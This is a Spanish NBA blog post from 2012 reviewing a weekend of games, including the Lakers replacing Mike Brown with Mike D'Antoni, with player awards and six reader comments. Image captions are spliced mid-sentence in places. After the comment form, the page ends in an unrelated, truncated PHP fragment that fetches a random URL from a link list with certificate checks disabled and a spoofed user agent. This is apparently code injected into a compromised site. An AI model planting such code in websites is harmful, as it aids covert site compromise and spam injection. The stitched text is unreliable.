Informe del fin de semana

12 de November de 2012 por txusma

Los partidos del fin de semana han pasado prácticamente a segundo plano tras darse a conocer la que será una de las noticias de la temporada: la destitución de Mike Brown como técnico de los Lakers tras  solo 5 partidos deD'Antoni y Kobe Bryant, dos hombres y un destino. liga regular. No hace falta profundizar en las causas ya que son por todos harto conocidas. Lo que ahora es necesario conocer es que, tras descartar la vuelta de Phil Jackson debido a sus altas exigencias, Los Angeles Lakers han llegado a un acuerdo con Mike D’Antoni para que sea su entrenador las próximas 4 temporadas. ¿Veremos a Pau Gasol echando espuma por la boca corriendo arriba y abajo sin parar? Sólo el tiempo lo dirá. Ahora vamos a resumir por encima lo que ha sucedido en la NBA entra el despido y la contratación del nuevo entrenador de los Lakers. Minucias, claro.

Lo primero realmente curioso es que los Lakers, con un Kobe Bryant excelso a la cabeza, han ganado sus 2 partidos. No eran 2 rivales muy duros (GS y Sacramento) pero parece algo sospechoso. ¿Le estarían haciendo la cama los jugadores? La paliza a los Warriors contundente y tampoco tuvieron muchos problemas para ganar a los Kings. Eso sí, Demarcus Cousins no jugó al estar suspendido por una de sus chiquilladas. Tras el partido contra los Spurs, el bueno de Cousins no tuvo mejor idea que encararse con Sean Elliot, ex jugador de los Spurs y actual comentarista de televisión. Resultado: 2 partidos de sanción y unos 75000€ de multa.

Hemos confirmado algunas otras cosas este fin de semana: que los Orlando Magic tendrán muy complicado no ser, a final de temporada, el peor equipo de la competición. En su back-to-back frente los Nets han anotado 71 puntos de media. Cifras vergonzosas para la NBA (no tanto para la Euroliga). E’taun Moore es una agradable sorpresa aunque tremendamente irregular, Nikola Vucevic nos deja destellos de lo buen pívot que puede llegar a ser pero sigue en fase de aprendizaje, Afflalo y Davis son los mejores del equipo pero demuestran que su rol en condiciones normales no debería estar mucho más allá de tercer-cuarto espada de un equipo… Con estos mimbres lo extraño en que en la franquicia no se decidan a dar más minutos a los rookies.

Jrue Holiday intenta sortear a Bargnani y CalderónLos Sixers, sin embargo, tiran para arriba de la mano de Jrue Holiday. El actual nivel del base demuestra lo que muchos sospechábamos: que Andre Iguodala le tapaba. Hay ganas de que vuelva Andrew Bynum para observar primero, como afecta su retorno a la juego de los Sixers, y segundo, cuál es su techo. Estaremos atentos. Otros que han tomado velocidad de crucero son los Knicks, únicos imbatidos, los Grizzlies, 5 partidos consecutivos ganando con victoria ante los Heat incluida, Clippers, y Thunder. Los Wolves perdieron anoche frente los Bulls pero también nos dejan buenas sensaciones y más teniendo en cuenta las bajas de Ricky Rubio y Kevin Love.

Dos equipos siguen sin estrenarse, Detroit y Washington. El primero con un más que alarmante 0-7 y unas estadísticas sonrojantes donde su mejor hombre, Greg Monroe, llega por los pelos a los 15 puntos por partido, y el % de acierto en tiros de 2 de alguna supuesta estellita no supera el 24%.  Este fin de semana han perdido contra Thunder y Rocket ampliamente. Los de la capital no están mucho mejor (0-5) pero estos al menos tienen algo de excusa. Siguen esperando a Wall, y al menos tienen alguna pequeña esperanza. El rookie Beal parece que despierta de su inicio titubeante y empieza a tirar del carro.

PREMIOS

MVP: Ha sido echar a Mike Brown y los Lakers ganar 2 partidos de la mano de un Kobe Bryant magnífico. 23’5 puntos, 7’5 rebotes, 6’5 asistencias, 1’5 robos en los 2 partidos que ha jugado. Otros que comandaron a sus equipo hacia la vistoria en los 2 partidos jugados fueron Jrue Holiday con 21 puntos y 14 asistencias el viernes y 16 puntos y 5 asistencias al día siguiente; Tim Duncan con exhibición el viernes (22 puntos, 12 rebotes, 4 asistencias, 3 robos y 4 tapones) y muy buen el partido el sábado (22-9); Serge Ibaka, 25 puntos, 7 rebotes y 3 tapones el viernes y 14 puntos, 7 rebotes y 7 tapones ayer noche, y Kenneth Faried con un par de doble-doble consecutivos (18-10 el viernes y 18-17 el sábado).Damian Lillard defiende a Patty Mills

Rookie: Este fin de semana se han dejado ver los rookies. El viernes fueron Anthony Davis, 23 puntos, 11 rebotes y 5 tapones; Andre Drummond, 22 puntos (con 8 de 10) y 8 rebotes, Dion Waiters, 23 puntos y Bradley Beal, 22 puntos y 4 rebotes. Y el sábado, Michael Kidd-Gilchrist, 25 puntos y 12 rebotes y Damian Lillard, 20 puntos 6 asistencias.

Sorpresa: Tantos partidos ayudan a que haya muchas sorpresa. Para empezar los 7 triples de Wayne Ellignton ayer mismo, o los 27 puntos de Gary Neal en la victoria de los Spurs ante los Blazers, o el retorno de Ben Gordon con 34 puntos el viernes. Ese mismo día, un tal Brian Roberts, jugador de los Hornets para más señas consiguió 16 puntos y 8 rebotes. Muchos aún lo buscamos en nuestra guía a ver quién es.

Esfuerzo en vano: Vamos con la sección de partidazos sin premio. Empezamos con George Hill y su 29-5-7 del viernes. Los 34 puntos que hemos comentado antes de Ben Gordon también son dignos de mención así como los 20 puntos (7 de 8) y 11 rebotes de Jeff Teague. El sábado fueron Nicolas Batum y Lamarcus Aldrdige los que no saborearon las mieles del triunfo a pesar de sus 33 y 29 puntos, respectivamente. Tampoco tuvo suerte Monta Ellis a pesar de anotar 32 y repartir 8 asistencias. Anoche, Lebron James sufrió una dura derrota aunque él anotara 20 puntos, capturara 10 rebotes y asistiera en 6 ocasiones.

Imágenes | AP Photos / Getty Images

Comenta

6 comentarios a esta entrada

  1. ralage dice:
    #1

    Que miedo darían estos Grizzlies con acierto desde los 3pts…

      Citar

  2. Denise dice:
    #2

    No sé porque le meteis tanta caña a los Magic, tienen 3 lesionados importantes (Nelson, Turkoglu y Harrington) y aun así están dando la cara, salvo en ese partido con los Nets. Yo veo como mínimo unos 5-6 equipos peores o de igual nivel.

    De todas formas, ojalá queden los últimos para tener mas opciones a pillar algo bueno del Draft, peor es que se queden en zona de nadie quedando el 20º de la competición.

      Citar

  3. Cocinitas dice:
    #3

    Vaya lacra con las lesiones en los Timberwolves, ahora pierden a Budinger por tiempo indefinido, esperemos una pronta recuperación de Love y Ricky sino las opciones de playoffs se esfumaran.

      Citar

  4. HisRoyalAirness dice:
    #4

    Cocinitas:
    Vaya lacra con las lesiones en los Timberwolves, ahora pierden a Budinger por tiempo indefinido, esperemos una pronta recuperación de Love y Ricky sino las opciones de playoffs se esfumaran.

    Me pone malo, qué mala suerte tenemos!!

    Es CAPITAL que vuelvan ya, sobre todo Love porque tienen que aprender a llevar ataques con él. Lo de Ricky es más problema porque hasta que vuelva no puede definirse realmente la transición ofensiva pero puede irse tirando.
    Si siguen ganando sin Budinger, Love, Ricky y con Roy renqueante yo voto porque metan a Adelman en el Hall of Fame la semana que viene

      Citar

  5. nba dice:
    #5

    La temporada es larga, los Wolves tienen tiempo para recuperar a sus lesionados, lo importante es que AK47 no caiga tambien.
    A Ellington no se que le ha pasado pero cuando estaba en Wolves no recuerdo que tuviese esas rachas de acierto. Menuda nochecita mas desacerta de Marc de cara al aro
    La victoria de Lakers no tiene mucho merito si los Kings no han podido contar con Cousins, que mala cabecita tiene el chaval, asi como se va a fijar alguna franquicia grande en el
    Respecto al fichaje D’Antoni creo que o de aqui a febrero se hacen trades que fortalezcan/rejuvenezcan la linea exterior o en playoffs les va a caer una buena tunda contra cualquier equipo del Oeste, ya que hace tiempo donde flojea mucho Lakers es en la defensa del perimetro, y cuando Pau sale a defender al base rival , y despues se queda a por uvas.
    Si fueseis GM de Warriors que movimientos hariais, porque yo esperaba que Bogut estuviese sano la mayor parte de la temporada, pero parece que va a seguir renqueando , y asi no interesa a la franquicia

      Citar

  6. GreenPride dice:
    #6

    Vaya paliza de los Grizllies a los Heat!! Ayer noche vi el partido y gran partido de los Osos con un Marc Gasol que a pesar de anotar 2 puntittos hizo un partido fenomenal asistiendo a sus compañeros. Los Heat sufrieron ante una de las parejas interiores más fuertes de la liga. Los Grizzlies tienen claro cuál es su potencial y cargan al juego interior de Marc&Zach como primera opción ofensiva. Como ya comenté mientras estén los 2 sanos este equipo de Memphis puede luchar y ganar a cualquiera y deberían luchar por los puestos de ventaja campo en los PO en el Oeste. Además Rudy Gay jugó fenomenal (y no me encuentro entre sus admiradores que digamos). Defensa mas que correcta ante LeBron (¡¡¡¡) y muy bien en ataque y contaron con un Wayne Ellington que les dio el lanzamiento exterior que les hace falta para aprovechar las ventajas que crean por dentro. Como dice ralage si este equipo metiera los triples…. el cielo sería su techo.
    A parte de eso vamos viendo que las sorpresas iniciales (Rockets, Magic, …) se van cayendo como era de esperar y los grandes equipos (OKC, Clippers, Heat, Sixers, Knicks, Spurs) empiezan a tomar las posiciones delanteras en sus conferencias. Aún falta por ver a equipos como Lakers o Celtics a ver si tiran definitivamente para arriba. Vamos a dar dos o tres semanas más a ver cómo se va cociendo la temporada

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>